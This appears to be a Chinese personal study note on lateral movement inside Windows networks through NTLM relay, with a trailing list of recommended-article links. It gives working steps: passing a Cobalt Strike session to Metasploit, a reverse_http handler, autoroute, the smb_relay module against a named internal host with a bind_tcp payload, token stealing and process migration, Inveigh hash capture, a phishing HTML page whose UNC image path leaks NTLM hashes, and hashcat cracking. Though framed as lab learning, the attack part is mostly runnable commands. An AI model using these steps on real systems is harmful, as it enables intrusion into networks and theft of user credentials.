11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

[一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线](#一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线)

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

[5、受控主机输入命令:dir \\192.168.46.166\c](#5、受控主机输入命令:dir \\192.168.46.166\c)

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截

2.1、钓鱼触发

3、破解密文


前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令 查看所需用户权限的进程号

steal_token 1668 切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992 #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166 kali 取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。
条件:两台主机用户密码一致

1、CS权限转给MSF:

复制代码
spawn l-msf

2、MSF:

复制代码
监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由:

复制代码
run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块:

复制代码
use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

Inveigh.exe

2、触发拦截

复制代码
dir \\192.168.3.x\c$
2.1、钓鱼触发

http://192.168.3.31/1.html

复制代码
<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、破解密文

复制代码
 hashcat -m 5600 hash pass.txt --show
相关推荐
安全系统学习5 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
2501_915921438 小时前
iOS IPA 混淆实测分析:从逆向视角验证加固效果与防护流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915918418 小时前
打造可观测的 iOS CICD 流程:调试、追踪与质量保障全记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9159090612 小时前
调试 WebView 旧资源缓存问题:一次从偶发到复现的实战经历
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9159214314 小时前
请求未达服务端?iOS端HTTPS链路异常的多工具抓包排查记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9160074719 小时前
iOS 接口频繁请求导致流量激增?抓包分析定位与修复全流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9160137419 小时前
用Fiddler中文版抓包工具掌控微服务架构中的接口调试:联合Postman与Charles的高效实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
00后程序员张21 小时前
调试 WebView 接口时间戳签名问题:一次精细化排查和修复过程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Whoisshutiao1 天前
Python网安-zip文件暴力破解(仅供学习)
开发语言·python·网络安全
柴郡猫^O^1 天前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试